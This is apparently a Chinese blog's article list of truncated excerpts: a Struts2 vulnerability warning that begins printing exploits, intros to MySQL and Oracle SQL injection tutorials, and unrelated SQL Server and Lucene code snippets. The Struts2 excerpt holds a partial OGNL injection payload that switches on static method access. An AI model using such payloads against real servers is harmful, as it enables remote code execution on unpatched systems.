文章列表
用struts2 的童鞋主意了,最近出了几个比较严重的安全漏洞,危害及大。没补丁的童鞋赶快补丁,服务器会被别人日了。
下面公布几个exp 有兴趣的童鞋可以去测试下,不懂的可以联系俺,共同探讨下。说不定还能发现0day.
15个漏洞及补丁自己去官网看:
https://cwiki.apache.org/confluence/display/WW/Security+Bulletins
exp1:
?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork ...
目录:
0x00 mysql一般注入(select)
0x01 mysql一般注入(insert、update)
0x02 mysql报错注入
0x03 mysql一般盲注
0x04 mysql时间盲注
0x05 mysql其他注入技巧
0x06 mysql数据库版本特性
0x07 声明
正文:
0x00 mysql一般注入(select)
1.注释 ...
MYSQL 注射精华
- 博客分类:
- sql 注入
MYSQL 注射精华
前言
鄙人今天心血来潮突然想写篇文章,鄙人从来没写过文章,如果有错误的地方请多多指教.本文需要有基础的SQL语句知识才可以更好的理解.建议想学习的人多去了解一下SQL语句和编程语言,知己知彼才能百战百胜.
我不希翼得到读者您的好评,尽管我尽力了;只希望本文能解决您学习过程的障碍,希望您早日掌握有关MYSQL注入方面的知识.
1.MYSQL 注射的产生.
漏洞产生原因 : 程序执行中未对敏感字符进行过滤,使得攻击者传入恶意字符串与结构化数据查询语句合并,并且执行恶意代码.
咱们先创造一个没有过滤的程序. 因为我机器上没有PHP,所以我就是用 J ...
Oracle web环境注射技术
- 博客分类:
- sql 注入
创建时间:2008-03-19
文章属性:原创
文章提交:T_Torchidy (jnchaha_at_163.com)
Oracle web环境注射技术
#
#BY 剑心
#http://www.loveshell.net
#
前言
本人不是一个专业的数据库管理员,也不是一个专门研究oracle安全的研究员,文中的 ...
方法一:
SELECT STUFF((SELECT ',' + CONVERT(VARCHAR(10),id) from product for xml path('')),1,1,'')
方法二:
SELECT @output = @output + ','
+ CAST(id AS VARCHAR) from product
方法一经过测试100w数据通过
方法二大概10万时间久比较长
bobo-browse 下载地址:http://code.google.com/p/bobo-browse/downloads/list
try {
final ResourceMapping mapping = ((InternalCompassSession) session)
.getMapping().findRootMappingByClass(type);
final LuceneSearchEngineInternalSearch lucene = LuceneHelper
.getLuceneInternalSearch(sessio ...